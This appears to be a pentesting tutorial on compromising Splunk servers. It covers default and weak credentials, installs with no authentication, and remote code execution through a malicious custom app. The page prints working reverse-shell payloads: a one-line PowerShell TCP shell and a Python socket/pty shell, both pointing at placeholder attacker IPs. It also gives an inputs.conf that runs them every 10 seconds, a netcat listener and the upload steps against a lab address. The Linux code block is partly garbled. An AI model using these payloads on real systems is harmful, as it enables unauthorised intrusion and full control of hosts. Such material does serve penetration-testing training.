Skip to content

Pentesting Splunk

Splunk is a log analytics tool used to gather, analyze and visualize data. Though not originally intended to be a SIEM tool, Splunk is often used for security monitoring and business analytics.

The biggest focus of Splunk during an assessment would be weak or null authentication because admin access to Splunk gives us the ability to deploy custom applications that can be used to quickly compromise a Splunk server.

Splunk is prevalent in internal networks and often runs as root on Linux or SYSTEM on Windows systems.

The Splunk web server runs by default on port 8000. Port 8089 is the Splunk management port for communication with the Splunk REST API.

On older versions of Splunk, the default credentials are admin:changeme, which are conveniently displayed on the login page. If the default credentials do not work, it is worth checking for common weak passwords such as adminWelcomeWelcome1Password123, etc.

The Splunk Enterprise trial converts to a free version after 60 days, which doesn’t require authentication. It is not uncommon for system administrators to install a trial of Splunk to test it out, which is subsequently forgotten about. This will automatically convert to the free version that does not have any form of authentication, introducing a security hole in the environment.

Default file structure

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/opt/splunk/
├── bin/                    
│   ├── splunk          # Main executable and helper scripts
│   ├── splunkcmd       # Command-line utilities
│   └── ...             # Other executables and scripts
├── etc/                    
│   ├── apps/           
│   │   ├── search/      # Default Search app
│   │   ├── launcher/    # App for launching Splunk Web
│   │   ├── _cluster/    # Clustering-related app (if applicable)
│   │   └── ...          # Other bundled/default apps
│   ├── system/          
│   │   ├── default/     # Default system configurations
│   │   │   ├── app.conf
│   │   │   ├── web.conf
│   │   │   └── ...      # Other default config files
│   │   └── local/       # Local (custom) configuration overrides
│   │       └── ...      
│   └── users/           # User-specific configuration settings
│       └── ...          
├── lib/                   
│   └── pythonX.Y/       # Bundled Python libraries (version may vary)
│       └── ...          
├── var/                   
│   ├── log/             
│   │   └── splunk/      # Log files directory
│   │       ├── splunkd.log
│   │       ├── web_service.log
│   │       └── ...      # Other log files
│   ├── run/             
│   │   └── splunk/      # Runtime files (PID files, sockets, etc.)
│   └── state/           
│       └── ...          # State and session data
└── share/                 
    ├── doc/             # Documentation files
    │   └── ...          
    └── examples/        # Example configurations and scripts
        └── ...
  • bin/ contains the primary executables and scripts used to start and manage Splunk.
  • etc/ is where configuration files reside. The apps/ directory holds all apps (both built-in and custom), while system/ contains global configuration files.
  • lib/ includes libraries required by Splunk, such as bundled versions of Python.
  • var/ holds runtime data such as logs, state information, and PID files.
  • share/ contains shared resources like documentation and example files.

Abusing built-in functionality to gain shell access

Splunk has multiple ways of running code, such as server-side Django applications, REST endpoints, scripted inputs, and alerting scripts.

A common method of gaining remote code execution on a Splunk server is through the use of a scripted input.

As Splunk can be installed on Windows or Linux hosts, scripted inputs can be created to run Bash, PowerShell, or Batch scripts. Also, every Splunk installation comes with Python installed, so Python scripts can be run on any Splunk system.

We can gain remote code execution on Splunk by creating a custom application to run Python, Batch, Bash, or PowerShell scripts.

reverse_shell_splunk

A simple splunk package for obtaining reverse shells on both Windows and most *nix systems._

Download from: https://github.com/0xjpuff/reverse_shell_splunk.git

Requirements:

  • splunk administrative access
  • a netcat / socat listener on the attacking machine

To push a reverse shell out to other hosts, the application must be placed in the $SPLUNK_HOME/etc/deployment-apps directory on the compromised host. In a Windows-heavy environment, we will need to create an application using a PowerShell reverse shell since the Universal forwarders do not install with Python like the Splunk server.

1. Depending on the target machine, you will either need to edit the rev.py for unix type machines or run.ps1 for Windows machines. Enter your attacking machine IP and ports.

1
git clone https://github.com/0xjpuff/reverse_shell_splunk.git

2. Your files and directory structure should look like this.

1
2
3
4
5
6
7
reverse_shell_splunk
├── bin
│   ├── rev.py
│   ├── run.bat
│   └── run.ps1
└── default
    └── inputs.conf

3. The inputs.conf file tells Splunk to run the run.bat script and any other conditions. Here we set the app as enabled and tell Splunk to run the script every 10 seconds. The interval is always in seconds, and the input (script) will only run if this setting is present. Nothing to do here:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
cat inputs.conf 

[script://./bin/rev.py]
disabled = 0  
interval = 10  
sourcetype = shell 

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

Case #1 Windows

4. If run.ps1 will be used, update attacking host and ip in run.ps1:

1
2
3
#A simple and small reverse shell. Options and help removed to save space. 
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient('attacker_ip_here',attacker_port_here);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

5. Create a tarball or .spl file.

1
tar -cvzf updater.tar.gz splunk_shell/

6. Now click INstall app from file in the Apps location: http://10.129.48.71:8000/en-US/app/launcher/apps/local

7. Before uploading the malicious custom app, let's start a listener using Netcat or socat.

1
 sudo nc -lnvp 443

8. On the Upload app page, click on browse, choose the tarball we created earlier and click Upload. As soon as we upload the application, a reverse shell is received as the status of the application will automatically be switched to Enabled.

Case #2 Linux

4. If we are dealing with a Linux host, we need to edit the file rev.py: update attacking host and ip.

```import sys,socket,os,pty ip="attacker-ip-here"
port="attacker port here"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn('/bin/bash') 

1
2
3
4
**5.** Create a tarball or `.spl` file.

```shell-session
tar -cvzf updater.tar.gz splunk_shell/

6. Now click INstall app from file in the Apps location: http://10.129.48.71:8000/en-US/app/launcher/apps/local

7. Before uploading the malicious custom app, let's start a listener using Netcat or socat.

1
 sudo nc -lnvp 443

8. On the Upload app page, click on browse, choose the tarball we created earlier and click Upload. As soon as we upload the application, a reverse shell is received as the status of the application will automatically be switched to Enabled.

Last update: 2025-02-07
Created: February 5, 2025 21:03:21